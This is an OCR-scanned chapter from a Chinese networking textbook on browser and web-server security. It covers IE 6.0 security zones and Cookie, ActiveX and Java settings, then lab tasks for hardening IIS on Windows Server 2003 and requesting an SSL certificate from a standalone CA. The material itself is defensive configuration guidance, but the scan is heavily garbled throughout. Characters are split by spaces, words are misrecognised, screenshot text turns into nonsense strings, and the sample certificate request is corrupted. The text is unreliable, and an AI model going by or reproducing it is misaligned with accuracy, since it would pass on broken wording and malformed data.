灵活 性 的 下 降 和 功能 的 限制 。 认为 不 网 区 二 的 oh 内 容 指 写实 全 计量 加 

安全 是 和 对 象 相关 的 。 一 般 可 以 认为 .小 
组 里 十 分 可 信 的 站 点 ,例如 ,办 公 室 的 软件 服 
务 器 的 数据 和 程序 是 比较 安全 的 ; 公司 ms 
Intranet 站 点 上 的 数据 和 程序 是 中 等 安全 的 ; | gn. 
而 Internet 上 的 大 多 数 访问 是 相当 不 安全 的 。 | Se A 

在 正中 ,定义 了 4 种 通过 浏览 器 访问 T 村 
Internet 的 安全 级 别 :高 、 中 、 中 低 、 低 。 同 时 ， 
提供 了 4 类 访问 对 象 :Internet、 本 地 Intranet、 rT 
受信 任 的 站 点 和 受 限制 的 站 点 ,如 图 10-1 所 
示 。 根 据 需 要 ,针对 不 同 的 访问 对 象 ,要 设置 
不 同 的 安全 级 别 。 图 10-1 访问 区 域 与 安全 级 别 
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正 浏 览 器 支持 Cookie、Java、ActiveX 等 网 络 新 技术 ,同时 也 可 以 通过 安全 配置 来 限制 
用 户 使 用 Cookie、 使 用 脚本 (Script) ,使 用 ActiveX 控件 .下 载 数据 和 程序 等 。 一 般 可 以 从 
以 下 几 个 方面 提高 使 用 浏览 器 的 安全 性 。 


1. Cookie 及 安全 设置 


Cookie 是 Netscape 公司 开发 并 将 其 作为 持续 保存 状态 信息 和 其 他 信息 的 一 种 方式 , 目 
前 大 多 数 的 浏览 器 都 支持 Cookie。Cookie 是 当 用 户 浏览 某 网 站 时 ,网 站 存储 在 用 户 计算 机 
上 的 一 个 小 文本 文件 (1 一 4KB) , 它 记 录 了 用 户 的 ID 密码、 浏览 过 的 网 页 停留 的 时 间 等 信 
息 , 当 用 户 再 次 访问 该 网 站 时 ,网 站 通过 读 取 Cookie, 得 知 用 户 的 相关 信息 ,就 可 以 做 出 相 
应 的 动作 ,如 在 页 面 显示 欢迎 用 户 的 标语 ,或 者 让 用 户 不 用 输入 ID 密码 就 能 直接 登录 等 。 

Cookie 文件 通常 是 以 user@domain 格式 命名 的 ,user 是 用 户 名 ,domain 是 所 访问 的 网 
站 的 域名 。 

一 般 来 说 ,Cookie 文件 中 的 信息 不 会 对 用 户 的 系统 产生 伤害 。 一 方面 ,Cookie 本 身 不 
是 可 以 运行 的 程序 ,也 不 是 应 用 程序 的 扩展 插件 ,更 不 能 像 病毒 一 样 对 用 户 的 硬盘 和 系统 产 
生 威 胁 , 没 有 能 力 直 接 与 用 户 的 硬盘 打交道 。Cookie 仅 能 保存 由 服务 器 提供 的 或 用 户 通过 
一 定 的 操作 产生 的 数据 。 另 一 方面 ,Cookie 文件 都 是 很 小 的 (通常 在 255 个 字 节 以 内 ) ,而 
且 各 种 浏览 器 都 具有 限制 每 次 存储 Cookie 文件 数量 的 能 力 ,因此 ,Cookie 文件 不 可 能 写 满 
整个 硬盘 。 

但 是 , 随 着 Internet 的 迅速 发 展 ,网 上 服务 功能 的 进一步 开发 和 完善 ,利用 网 络 传递 
的 资料 信息 僵 来 愈 重要 ,有 时 涉及 个 人 的 隐私 。 因 此 ,关于 Cookies 的 一 个 值得 关心 的 问 
题 并 不 是 Cookies 对 用 户 的 计算 机 能 做 些 什 么 ,而 是 能 存储 些 什么 信息 或 传递 什么 信息 
到 连接 的 服务 器 中 。 由 于 一 个 Cookie 是 Web 服务 器 放置 在 用 户 计 算 机 中 并 可 以 重新 获 
取 档 案 的 唯一 标识 符 , 因 此 Web 站 点 管理 员 可 以 利用 Cookies 建立 关于 用 户 及 其 浏览 特 
征 的 详细 资料 。 当 用 户 登录 到 一 个 Web 站 点 后 .在任 一 设置 了 Cookies 的 网 页 上 的 单 击 
操作 信息 都 会 被 加 到 该 档案 中 。 档 案 中 [ggg 3 
的 这 些 信息 暂时 主要 用 于 对 站 点 的 设计 [em Tes [ne [ne [em [i [0 
维护 ,但 除 站 点 管理 员外 并 不 否认 被 其 他 设置 
人 窃取 的 可 能 ,假如 这 些 Cookies 持 有 者 
们 把 一 个 用 户 身 份 链接 到 他 们 的 Cookies | 识 
ID, 利 用 这 些 档案 资料 就 可 以 确认 用 户 的 i 
名 字 及 其 地 址 。 因 此 ,现在 许多 人 认为 
Cookie 的 存在 对 个 人 隐私 是 一 种 潜在 的 
威胁 。 EEC | (SAD | 

为 了 保证 上 网 安全 .可 对 Cookie 进行 Wr 
适当 设置 。 在 下 E 6.0 中 ,打开 “工具 / 
Internet 选项 ”中 的 “隐私 ”选项 卡 , 调 整 
Cookie 的 安全 级 别 。 通 常情 况 下 ,可 以 将 
滑 块 调整 到 “中 高 "或 者 “高 ”的 位 置 .如 
图 10-2 所 示 。 多 数 的 论坛 站 点 需要 使 用 图 10-2 调整 Cookie 的 安全 级 别 


移动 滑 块 来 为 Internet 区 域 选择 一 个 隐私 设置 . 


团 阻 止 弹 出 窗口 @) 
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Cookie 信息 ,如果 用 户 从 来 不 去 这 些 地 方 ,可 以 将 安全 级 别 调 到 “阻止 所 有 Cookie”。 如 果 
只 是 为 了 禁止 个 别 网 站 的 Cookie, 可 以 单 击 * 站 点 ”按钮 ,将 要 屏蔽 的 网 站 添加 到 列表 中 。 


2. ActiveX 及 安全 设置 


ActiveX 是 Microsoft 公司 提供 的 一 款 高 级 技术 , 它 可 以 像 一 个 应 用 程序 一 样 在 浏览 器 
中 显示 各 种 复杂 的 应 用 。 

ActiveX 是 一 种 应 用 集合 ,包括 ActiveX 控件 、ActiveX 文档 、ActiveX 服务 器 框架 、 
ActiveX 脚本 、HTML 扩展 等 , 它 使 得 在 万 维 网 上 交互 内 容 得 以 实现 。 利 用 ActiveX 技术 ， 
网 上 应 用 变 得 生动 活泼 ,伴随 着 多 媒体 效果 ,交互 式 对 象 和 复杂 的 应 用 程序 ,使 用 户 犹 如 感 
受 CD 质量 的 音乐 一 般 。 它 的 主要 好 处 是 :动态 内 容 可 以 吸引 用 户 ,开放 的 、 跨 平台 支持 可 
以 运行 在 Windows、UNIX 等 多 种 操作 系统 上 ,支持 工具 广泛 。 

由 于 ActiveX 的 功能 强大 性 和 开放 性 ,在 使 用 正 浏览 器 访问 Internet 的 时 候 也 就 经 常 
会 碰 到 ActiveX 的 恶意 攻击 。 由 于 ActiveX 控制 不 含有 任何 类 似 的 严格 安全 性 检查 或 资源 
权限 检查 ,使 用 户 在 使 用 正 浏览 器 浏览 一 些 带 有 恶意 的 ActiveX 控件 时 ,可 以 在 用 户 毫 不 
知情 的 情况 下 执行 Windows 系统 中 的 任何 程序 ,将 用 户 计算 机 上 的 机 密 信息 发 送 给 
Internet 上 的 某 台 服务 器 ,向 局 域 网 中 传播 病毒 ,甚至 修改 用 户 IE 的 安全 设置 等 。 这 些 都 
会 给 用 户 带 来 很 大 的 安全 风险 。 

在 I 正中 ,可 以 根据 实际 需要 对 ActiveX 的 使 用 进行 限制 ,在 一 定 程度 上 可 以 减少 
ActiveX 所 带 来 的 安全 隐患 。 

在 图 10-1 中 , 单 击 * 自 定义 级 别 ?按钮 ,出现 * 安 全 设置 ?对 话 框 。 移 动 垂直 滚动 条 ,直到 
出 现 “ActiveX 控件 和 插件 ”设置 选项 ,如 图 10-3 所 示 。 

这 里 主要 有 5 个 设置 。 

(1) 对 标记 为 可 安全 执行 脚本 的 
ActiveX 控件 执行 脚本 。 这 个 设置 是 为 标 上 
记 为 安全 执行 脚本 的 ActiveX 控件 执行 脚 | | 硬 het 于 证 
本 设置 执行 的 策略 。 所 谓 * 对 标记 为 可 安 ES 
全 执行 脚本 的 ActiveX 控件 执行 脚本 ”, 就 
是 指 具备 有 效 的 软件 发 行商 证 书 的 软件 。 
该 证 书 可 以 说 明 是 谁 发 行 了 该 控件 而 且 没 
有 被 自 改 。 知 道 了 是 谁 发 行 的 控件 ,用 户 
就 可 以 决定 是 否 信任 该 发 行商 。 如 果 控 件 
未 签名 ,那么 用 户 将 无 法 知道 是 谁 创建 的 站 
以 及 能 否 信任 。 指 定 希望 以 何 种 方式 处 理 重 置 自 定义 设置 
有 具有 潜在 危险 的 操作 文件 ,程序 或 下 载 内 重 置 为 到 ): | 安全 级 - 中 六 [于 要 ] 
容 ,并 选择 下 面 的 某 项 操作 。 

中 如 果 希 望 在 继续 之 前 给 出 请 求 批准 Ce (We 
的 提示 ,就 选中 “提示 ” 单 选 按钮 。 

@ 如 果 希 望 不 经 提示 并 自动 拒绝 操作 图 10-3 ActiveX 安全 设置 
或 下 载 ,就 选中 “禁用 ” 单 选 按 钮 。 
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@ 如 果 和 希望 不 经 提示 自动 继续 ,就 选中 “启用 ” 单 选 按钮 。 

(2) 对 没有 标记 为 安全 的 ActiveX 控件 进行 初始 化 和 脚本 运行 。 这 个 设置 是 为 没有 标 
记 为 安全 执行 脚本 的 ActiveX 控件 执行 脚本 设置 执行 的 策略 。IE 默认 设置 为 “禁用 ”, 用 户 
最 好 不 要 修改 。 

(3) 下 载 未 签名 的 ActiveX 控件 。 这 个 设置 是 为 未 签名 的 ActiveX 控件 的 下 载 提供 策 
略 。 未 签名 的 意思 和 没有 标记 为 安全 执行 脚本 的 意思 是 一 样 的 。IE 默认 设置 为 “禁用 ”, 用 
户 最 好 不 要 修改 。 

(4) 下 载 已 签名 的 ActiveX 控件 。 这 个 设置 是 为 已 签名 的 ActiveX 控件 的 下 载 提供 策 
咯 。IE 默认 设置 为 “提示 ”, 最 好 不 要 自行 改变 。 

(5) 运行 ActiveX 控件 和 插件 。 这 个 设置 是 为 了 运行 ActiveX 控件 和 插件 的 安全 。 这 
是 最 重要 的 设置 ,但 许多 站 点 都 使 用 ActiveX 作为 脚本 语言 ,所 以 建议 将 其 设置 为 “提示 ?”。 
这 样 当 有 ActiveX 运行 时 ,IE 就 会 提醒 用 户 , 用 户 可 以 根据 当时 所 处 的 网 站 ,决定 是 否 使 用 
该 网 站 提供 的 ActiveX 控件 。 例 如 ,访问 Sina、Sohu 等 大 型 网 站 ,用 户 当然 可 以 相信 它 , 从 
而 可 以 放心 地 运行 它 提供 的 ActiveX 控件 。 


3. Java 语言 及 安全 设置 


Java 语言 的 特性 使 它 可 以 最 大 限度 地 利用 网 络 。Applet 是 Java 的 小 应 用 程序 , 它 是 
动态 、 安 全、 跨 平台 的 网 络 应 用 程序 。Java Applet 嵌入 HTML 语言 ,通过 主页 发 布 到 
Internet。 当 网 络 用 户 访问 服务 器 的 Applet 时 ,这 些 Applet 在 网 络 上 进行 传输 ,然后 在 支 
持 Java 的 浏览 器 中 运行 。 由 于 Java 语言 的 机 制 . 用 户 一 旦 载 和 人 Applet, 就 可 以 生成 多 媒体 
的 用 户 界 面 或 完成 复杂 的 应 用 。Java 语言 可 以 把 静态 的 超 文 本 文件 变 成 可 执行 应 用 程序 ， 
极 大 地 增强 了 超 文本 的 可 交互 操作 性 。 

Java 在 给 人 们 带 来 好 处 的 同时 ,也 带 来 
了 潜在 的 安全 隐患 。 由 于 现在 Internet 和 
Java 在 全 球 应 用 得 越 来 越 普 及 .因此 人 们 在 
浏览 Web 页 面 的 同时 也 会 同时 下 载 大 量 的 
Java Applet, 这 就 使 得 Web 用 户 的 计算 机 面 
临 的 安全 威胁 比 以 往 任何 时 候 都 要 大 。 

在 用 户 浏览 网 页 时 ,这 些 黑客 的 Java 攻 
击 程序 就 已 经 侵入 到 用 户 的 计算 机 中 去 了 。 
所 以 在 网 络 上 ,不 要 随便 访问 信用 度 不 高 的 < 
站 点 ,以 防止 黑客 的 入侵 。 重 置 自 定义 设置 

在 I 正中 也 可 以 对 Java 的 使 用 进行 限 重 置 为 @): | 安全 级 - 中 
制 。 在 图 10-3 中 ,移动 垂直 滚动 条 ,直到 看 
到 “Java 小 程序 脚本 ?选项 .如 图 10-4 所 示 。 
根据 实际 需要 ,可 以 设置 “禁用 ”、“ 启 用 ” 
或 -所 过 2 图 10-4 Java 安全 设置 
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104 项 目 实 施 


10.4.1 任务 1:Web 服务 器 的 安全 配置 


1. 任务 目标 

(1) 掌握 IIS 的 安装 方法 。 

(2) 掌握 IIS 的 安全 设置 方法 。 

2. 任务 内 容 

(1) IIS 的 安装 。 

(2) 设置 IIS 安全 。 

3. 完成 任务 所 需 的 设备 和 软件 
Windows Server 2003 计算 机 1 台 。 
4. 任务 实施 步骤 


(1) IIS 的 安装 

步骤 1: 在 Windows Server 2003 控制 面板 中 ,运行 “添加 或 删除 程序 ”程序 ,然后 单 击 
左 侧 窗 格 中 的 “添加 /删除 Windows 组 件 ” 按 钮 ,打开 Windows 组 件 向 导 , 双 击 “ 应 用 程序 服 
务 器 ”选项 ,打开 “应 用 程序 服务 器 ”对 话 框 ,选中 “Internet 信息 服务 (1IS)” 和 “启用 网 络 
COM 十 访问 " 复 选 框 ,如 图 10-5 所 示 。 

步骤 2: 单 击 “ 确 定 ” 按 钮 .返回 Windows 组 件 向 导 , 单 击 “ 下 一 步 " 按 钮 ,开始 安装 IIS 
组 件 ,最 后 单 击 “ 完 成 ”按钮 。 


应 用 程序 服务 器 | 


侧 店 

口 蒜 消 息 队列 

口 篇 应 用 程序 服务 器 控制 台 

描述 ，ITS 包括 Web ,FTP ,STF 和 JITP 支持 ， rentPage Server 
rer At | 


TR Ne Ed 
w=] 


图 10-5 “应 用 程序 服务 器 "对话 框 
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(2) 设置 IIS 安全 

QO@ IP 地 址 限制 。IIS 可 以 允许 或 拒绝 从 特定 IP 地 址 发 来 的 服务 请 求 ,有 选择 地 允许 特 
定 站 点 可 以 访问 Web 服务 器 ,并 能 够 阻止 除了 特定 IP 地 址 以 外 的 其 他 站 点 访问 Web 服 
务 器 。 

步骤 1: 选择 “开始 ”一 程序 ”管理 工具 ”一 Internet 信息 服务 (IIS) 管 理 器 ”命令 , 打 
开 “Internet 信息 服务 (IIS) 管 理 器 ”窗口 , 右 击 * 默 认 网 站 ?选项 ,在 弹出 的 快捷 菜单 中 选择 
“属性 ”命令 ,打开 “默认 网 站 属性 ?对 话 框 ,如 图 10-6 所 示 。 

步骤 2: 在 “目录 安全 性 ”选项 卡 中 , 单 击 “IP 地 址 和 域名 限制 "区域 中 的 “编辑 ”按钮 , 打 
开 *IP 地 址 和 域名 限制 ”对 话 框 ,如 图 10-7 所 示 。 


EI x 
网 5 | 性 甩 | IsWfT 着 过 器 | 主 上 录 | 文档 
目录 安全 性 | mm | 自 定义 鱼油 


mw | mw | Smw | wj 


图 10-6 “默认 网 站 属性 "对话 框 图 10-7 “IP 地 址 和 域名 限制 "对 话 框 


步骤 3: 如 果 选 中 “授权 访问 ” 单 选 按钮 ,默认 情况 下 ,所 有 计算 机 都 将 被 授权 访问 。 如 
果 要 将 某 台 或 某 组 计算 机 排除 在 外 ( 即 被 拒绝 访问 ), 则 需 单 击 “ 添 加 ”按钮 ,打开 “拒绝 访问 ” 
对 话 框 。 

选中 “一 台 计 算 机 " 单 选 按钮 ,并 设置 该 计算 机 的 IP 地 址 ,如 图 10-8 所 示 , 可 拒绝 该 计 
算 机 访问 。 

选中 “一 组 计算 机 ” 单 选 按钮 ,并 设置 该 组 计算 机 的 网 络 标识 和 子 网 掩 码 , 如 图 10-9 所 示 ， 
可 拒绝 该 组 计算 机 访问 。 

图 10-10 显示 了 只 有 IP 地 址 为 192. 168. 1. 110 的 计算 机 被 拒绝 访问 ,而 其 他 所 有 计算 
机 都 被 授权 访问 。 

在 图 10-7 中 ,如 果 选 中 “拒绝 访问 " 单 选 按 钮 ,默认 情况 下 ,所 有 计算 机 都 将 被 拒绝 访 
问 。 如 果 要 将 某 台 或 某 组 计算 机 排除 在 外 ( 即 被 授权 访问 ) , 则 需 单 击 “ 添 加 ”按钮 进行 设置 ， 
设置 方法 同上 。 

@ 端口 限制 。 可 以 通过 端口 访问 各 种 网 络 服务 ,如 FTP 服务 的 默认 端口 是 21. Web 
服务 的 默认 端口 是 80 等 ,因此 可 以 通过 修改 默认 端口 来 提高 网 络 服务 的 安全 性 。 

步骤 1: 在 “默认 网 站 属性 ?对 话 框 的 “网 站 ?选项 卡 中 ,把 “TCP 端口 "文本 框 中 的 默认 
端口 80 修改 成 其 他 值 (如 8080) ,如 图 10-11 所 示 。 
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图 10-8 拒绝 某 台 计 算 机 访问 图 10-9 拒绝 某 组 计算 机 访问 


10-10 设置 某 台 计 算 机 被 拒绝 访问 后 的 对 话 框 图 10-11 修改 TCP 端口 


步骤 2: 未 修改 默认 TCP 端口 时 ,可 用 “http://192. 168. 1. 19” 来 访问 网 站 ,修改 了 默 
认 的 TCP 端口 后 , 须 用 “http://192. 168. 1. 19:8080” 来 访问 网 站 , 即 在 原 网 址 后 面 加 上 修 
改 后 的 端口 号 (中 间 用 冒号 相连 ) ,其 中 *192. 168. 1.19” 是 Web 服务 器 的 IP 地 址 。 

@ 访问 权限 控制 。 

步骤 1: 在 “默认 网 站 属性 ”对 话 框 的 “ 主 日 录 ” 选 项 卡 中 ,选中 “记录 访问 ”“ 读 取 ” 和 
“索引 资源 ” 复 选 框 。 在 “应 用 程序 设置 ”区域 中 ,“ 应 用 程序 名 ”设置 为 “默认 应 用 程序 ”“ 执 
行 权限 ”设置 为 “ 纯 脚 本 ”, 如 图 10-12 所 示 。 

如 果 将 Web 服务 器 安装 在 NTFS 分 区 中 ,还 可 以 对 NTFS 文件 系统 的 文件 和 文件 夹 
的 访问 权限 进行 控制 ,对 不 同 用 户 组 和 用 户 授予 不 同 的 访问 权限 .进一步 提高 安全 性 。 

步骤 2: 右 击 要 访问 的 文件 或 文件 夹 ( 如 *C:Ntest" 文 件 夹 ) .在 弹出 的 快捷 菜单 中 选择 
“共享 和 安全 ”命令 .在 打开 的 “test 属性 ”对 话 框 中 选择 “安全 ”选项 卡 , 如 图 10-13 所 示 。 

步骤 3: 在 “组 或 用 户 名 称 ” 列 表 框 中 选择 访问 该 文件 或 文件 夹 的 用 户 组 (或 用 户 ) ,然后 
在 下 方 的 权限 列表 框 中 设置 相应 的 权限 。 

另外 ,还 可 以 利用 NTFS 文件 系统 的 审核 功能 来 实现 访问 控制 。 

步骤 4: 在 图 10-13 中 , 单 击 “高 级 ”按钮 ,打开 如 图 10-14 所 示 的 对 话 框 ,选择 “审核 ? 选 
项 卡 。 

步骤 5: 单 击 “ 添 加 ”按钮 ,打开 “选择 用 户 或 组 ”对 话 框 ( 见 图 10-14) ,在 “输入 要 选择 的 
对 象 名 称 ” 文 本 框 中 输入 Everyone, 或 单 击 “ 高 级 "按钮 选择 输入 ,然后 单 击 “ 确 定 ” 按 钮 , 打 
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开 *test 的 审核 项 目 ” 对 话 框 ,如 图 10-15 所 示 。 


E 


pm—— 
回 
回 
回 
回 
回 
J 


hoooo00 


mw | wa | 


| | 本 用 由 


图 10-14 设置 NTFS 的 审核 功能 图 10-15 审核 读 取 权 限 


步骤 6: 设置 相应 的 审核 项 目 ,如 对 “ 读 取 权限 ”的 成 功 审核 ,然后 单 击 “ 确 定 ” 按 钮 ,此 时 
会 在 “审核 ”选项 卡 的 “审核 项 日 ”列表 框 中 显示 审核 项 日 ,最 后 单 击 “ 确 定 ” 按 钮 ,完成 审核 功 
能 的 设置 。 

@ 用 户 访问 限制 。 用 IIS 搭建 的 Web 网 站 的 默认 匿名 访问 方式 适用 于 访问 一 般 网 页 ， 
并 不 适用 于 一 些 安全 性 要 求 较 高 的 网 站 ,这 时 需要 对 访问 用 户 进行 身份 验证 ,确保 只 有 经 过 
授权 的 用 户 才 能 实现 对 Web 信息 的 访问 和 浏览 。 

步骤 1: 禁用 匿名 访问 。 在 图 10-6 中 , 单 击 “ 身 份 验证 和 访问 控制 ”区 域 中 的 “编辑 ” 按 
钮 ,打开 如 图 10-16 所 示 的 “身份 验证 方法 ”对 话 框 .取消 选中 “启用 匿名 访问 ” 复 选 框 。 

步骤 2: 使 用 用 户 身份 验证 。 从 图 10-16 中 可 以 看 到 .除了 匿名 访问 方式 外 .还 有 其 他 
身份 验证 方式 ,这 里 选中 “集成 Windows 身份 验证 ? 复 选 框 。 

@ 更 改 IIS 日志 的 路 径 。 
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步骤 1: 在 图 10-11 中 .选中 “启用 日 志 记 录 ” 复 选 框 ,再 单 击 “ 属 性 ”按钮 ,打开 如 
图 10-17 所 示 的 “日 志 记 录 属 性 ”对 话 框 。 


图 10-16 “身份 验证 方法 ”对 话 框 图 10-17 “日 志 记 录 属 性 ”对 话 框 


步骤 2: 在 “常规 ”选项 卡 中 可 以 看 到 ,IIS 日 志文 件 默 认 存 放 在 “C:\WINDOWS\ 
system32\LogFiles” 文 件 夹 中 ,在 “日 志文 件 日 录 ” 文 本 框 中 输入 其 他 路 径 , 或 通过 “浏览 ” 按 
钮 选择 输入 ,可 以 更 改 IIS 日 志 的 存放 路 径 。 

因为 日 志 是 系统 安全 策略 中 的 重要 环节 ,确保 日 志 的 安全 能 有 效 提高 系统 整体 安全 性 。 
为 了 保护 日 志 安全 ,还 可 将 日 志 设置 成 只 有 管理 员 才 能 访问 。 

@ 删除 危险 的 IIS 组 件 。SMTP 服务 .NNTP、 样 本 页 面 .脚本 .虚拟 目录 等 可 能 会 造成 
安全 威胁 ,可 考虑 将 其 删除 。 


10.4.2 任务 2: 通 过 SSL 访问 Web 服务 器 


1. 任务 目标 


(1) 了 解 SSL 的 工作 原理 。 
(2) 了 解数 字 证 书 的 申请 、 安 装 和 使 用 。 
(3) 掌握 在 Web 服务 器 和 客户 端 浏 览 器 上 设置 SSL 的 方法 。 


2. 任务 内 容 


(1) CA 证 书 服务 器 的 安装 。 
(2) Web 服务 器 数字 证 书 的 申请 与 安装 。 
(3) 客户 端 浏 览 器 的 SSL 设置 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) Windows Server 2003 计算 机 1 台 . 作 为 Web 服务 器 。 
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(2) Windows XP/2003 计算 机 1 台 , 作 为 客户 端 。 
4. 任务 实施 步骤 


(1) CA 证 书 服 务 器 的 安装 

在 安装 证 书 服务 之 前 ,在 Windows Server 2003 服务 器 中 要 先 将 IIS 安装 好 ,为 通过 
Web 申请 和 下 载 数字 证 书 提供 ASP 脚本 语言 的 支持 。 

步骤 1: 在 Windows Server 2003 控制 面板 中 ,运行 “添加 或 删除 程序 ”程序 ,然后 单 击 
“添加 /删除 Windows 组 件 ” 按 钮 ,打开 Windows 组 件 向 导 , 如 图 10-18 所 示 。 

步骤 2: 在 “组 件 ” 列 表 框 中 ,选中 “证 书 服务 ” 复 选 框 ,弹出 提示 信息 对 话 框 ,如 图 10-19 
所 示 ,提示 安装 证 书 服务 后 ,计算 机 名 称 和 域 成 员 身份 将 不 可 再 改变 , 单 击 “ 是 ”按钮 。 


nn 


起 人 


CL 
[ECEE EEC 
4 
oo0m 下 
国 osm 到 
| 


实生 证 必 妥 机构 5 人 以便 且 帮 诈 世 用 于 公 铀 安全 程序 。 


图 10-18 Windows 组 件 向 导 图 10-19 证 书 服务 提示 信息 


步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,打开 “CA 类 型 "对 话 框 ,如 图 10-20 所 示 , 选 中 * 独 立根 
CA" 单 选 按钮 。 

步骤 4: 单 击 “ 下 一 步 ” 按 钮 ,打开 “CA 识别 信息 ”对 话 框 ,如 图 10-21 所 示 , 在 “此 CA 的 
公用 名 称 ” 文 本 框 中 输入 CA 的 名 称 , 如 TKY ,在 “可 分 辨 名称 的 预览 ”文本 框 中 会 出 现 该 名 
称 的 标准 X. 500( 一 种 网 络 资源 名 称 的 国际 标准 ) 格 式 ,CA 的 有 效 期 限 可 根据 需要 进行 设 
置 和 调整 ,默认 为 5 年 。 

步骤 5: 单 击 *“ 下 一 步 ? 按 钮 ,此 时 将 开始 生成 加 密 密 钥 ,之 后 打开 * 证 书 数据 库 设 置 " 对 
话 框 ,如 图 10-22 所 示 ,可 以 设置 证 书 服务 器 上 的 证 书 数据 库 .证书 数 据 库 日 志 , 以 及 配置 信 
息 的 存放 位 置 ,使 用 默认 设置 值 就 可 以 。 

步骤 6: 单 击 * 下 一 步 ” 按 钮 .弹出 “要 完成 安装 .证 书 服务 必须 暂时 停止 Internet 信息 服 
务 。 您 要 现在 停止 服务 吗 ?” 的 提示 信息 ,如 图 10-23 所 示 。 

步骤 7: 单 击 “ 是 ”按钮 ,安装 程序 开始 进行 证 书 服务 的 配置 更 改 , 如 果 在 IIS 中 未 启用 
ASP, 会 弹出 如 图 10-24 所 示 的 提示 信息 ,提示 是 否 启用 ASP. 单 击 “ 是 ”按钮 。 最 后 , 单 击 
“完成 ”按钮 。 

安装 完成 后 ,在 IIS 的 默认 站 点 中 会 自动 创建 CertContrl、CertEnroll 和 CertSrv 三 个 
虚拟 目录 ,用 于 提供 证 书 服务 。 
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图 10-20 “CA 类 型 "对 话 框 图 10-21 “CA 识别 信息 ”对 话 框 


图 10-23 暂停 IIS 服务 的 提示 信息 


图 10-24 是否 启用 ASP 的 提示 信息 


(2) Web 服务 器 数字 证 书 的 申请 与 安装 

@ 生成 Web 服务 器 数字 证 书 申请 文件 。 

步骤 1: 选择 “开始 ”一 “程序 ”>“ 管 理工 具 ”>“Internet 信息 服务 (IIS) 管 理 器 ”命令 . 打 
开 “Internet 信息 服务 (IIS) 管 理 器 ”窗口 , 右 击 “ 默 认 网 站 ”选项 ,在 弹出 的 快捷 菜单 中 选择 
“属性 ”命令 ,打开 “默认 网 站 属性 ”对 话 框 ,如 图 10-25 所 示 。 

步骤 2: 在 “日 录 安全 性 ”选项 卡 中 , 单 击 “ 安 全 通信 ”区 域 中 的 “服务 器 证 书 ” 按 钮 ,在 打 
开 的 Web 服务 器 证 书 向 导 的 欢迎 页 面 中 , 单 击 “ 下 一 步 ” 按 钮 ,打开 “服务 器 证 书 ” 对 话 框 ,如 
10-26 所 示 ,选中 “新 建 证 书 ” 单 选 按钮 。 

步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,打开 “延迟 或 立即 请 求 ” 对 话 框 ,如 图 10-27 所 示 , 选 中 “ 现 
在 准备 证 书 请 求 , 但 稍 后 发 送 " 单 选 按钮 。 
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图 10-25 “默认 网 站 属性 ”对 话 框 图 10-26 “服务 器 证 书 ” 对 话 框 


步骤 4: 单 击 “ 下 一 步 "按钮 ,打开 “名 称 和 安全 性 设置 "对 话 框 ,如 图 10-28 所 示 , 在 “名 
称 " 文 本 框 中 输入 Web 服务 器 的 数字 证 书 名 称 ,如 “电子 商务 网 站 证 书 ”, 选 择 密 钥 位 长 为 
1024 ,并 选中 “选择 证 书 的 加 密 服 务 提供 程序 " 复 选 框 。 


图 10-27 “延迟 或 立即 请 求 ”对话 框 图 10-28 “名 称 和 安全 性 设置 ”对话 框 


步骤 5: 单 击 “* 下 一 步 ” 按 钮 ,打开 “可 用 提供 程序 ”对 话 框 ,如 图 10-29 所 示 , 选 择 第 二 个 
选项 , 即 Microsoft RSA SChannel Cryptographic Provider 选项 。 

步骤 6: 单 击 * 下 一 步 " 按 钮 ,打开 “单位 信息 ”对 话 框 ,如 图 10-30 所 示 , 输 入 “单位 ”和 
“部 门 ” 名 称 , 如 tzvest 和 computer。 

步骤 7: 单 击 * 下 一 步 ” 按 钮 ,打开 “站 点 公用 名 称 ” 对 话 框 ,如 图 10-31 所 示 , 在 “公用 名 
称 ” 文 本 框 中 输入 公用 名 称 ,一 般 设置 为 服务 器 名 称 , 如 tzvest-server。 

步骤 8: 单 击 * 下 一 步 ” 按 钮 ,打开 “地 理 信息 ”对 话 框 ,如 图 10-32 所 示 , 在 “省 /自治 区 ” 
和 “市 县 ”文本 框 中 输入 单位 所 在 的 地 理 区 域 .如 zhejiang 和 taizhou。 

步骤 9: 单 击 “ 下 一 步 ?按钮 ,打开 * 证 书 请 求 文件 名 ”对话 框 :如 图 10-33 所 示 . 保 留 默 认 
的 文件 名 为 “C:Ncertreq. txt”。 

步骤 10: 单 击 “下 一 步 ?按钮 ,打开 * 请 求 文件 摘要 ”对 话 框 , 如 图 10-34 所 示 ,确认 信息 
无 误 后 : 单 击 * 下 一 步 ?按钮 ,再 单 击 “完成 按钮 。 
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图 10-29 “可 用 提供 程序 "对 话 框 图 10-30 “单位 信息 "对话 框 


图 10-31 “站 点 公用 名 称 ” 对 话 框 图 10-32 “地 理 信息 ”对 话 框 


图 10-33 “证 书 请 求 文件 名 ”对 话 框 图 10-34 “请 求 文件 摘要 ”对 话 框 


步骤 11: 打开 证 书 请 求 文件 “C:\certreq. txt”, 加 密 后 的 证 书 请 求 文 件 内 容 如 
图 10-35 所 示 。 

@ 申请 Web 服务 器 数字 证 书 。 

步骤 1: 在 正 浏览 器 中 访问 *http://192. 168. 1.19/certsrv” 网 址 ,其 中 192. 168. 1. 19 
为 CA 证 书 服务 器 的 IP 地址。 出现 如 图 10-36 所 示 的 “证 书 服务 "页面 。 

步骤 2: 单 击 “ 申 请 一 个 证 书 ” 超 链接 .出现 如 图 10-37 所 示 的 “证 书 类 型 选择 ”页 面 。 
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ECT 


BEGIN MEY CERTIFICATE REQUEST-— 


DSTCCAr ICRQnwbjELHRKSRTUEBhHCQBsxETRPB9HUBA9TCHpoZyppYV5nMRhw 


DgYDUQQNE wd OYUL6 269 HIDQYDUQOKE v2 Genz 


jc30xETAPB9NUBRSTCGHubXB1 


JyHRYuF AYDUQQDE v1 GenZ jc3Qtc2UydnUyMICF NA OGCS qeS Ib3DQEBAQUARAGH 
ioCBiQKB9QCPN0DzwCewQkCHuykziJFosa8u6Jc5/9193bxcarPEPo96QuyepPo3 


68pUNGc3bOAJF u2UF TVQcjBTIb/LYyuRPKutz8EtXiroaRPWoaKLySLSXhMSuPIX 


1FPieP9ysxw2569zCsukIpXY5nLU5Tblf9zHOBdF， 
Ha3ngaALhntdhTBOizAFUPJy*6/TF/qu 


---- END NEW CERTIFICATE REQUEST-- 


rrxwd5uHa8w3129j/313Eruv 


申请 一 个 证 书 


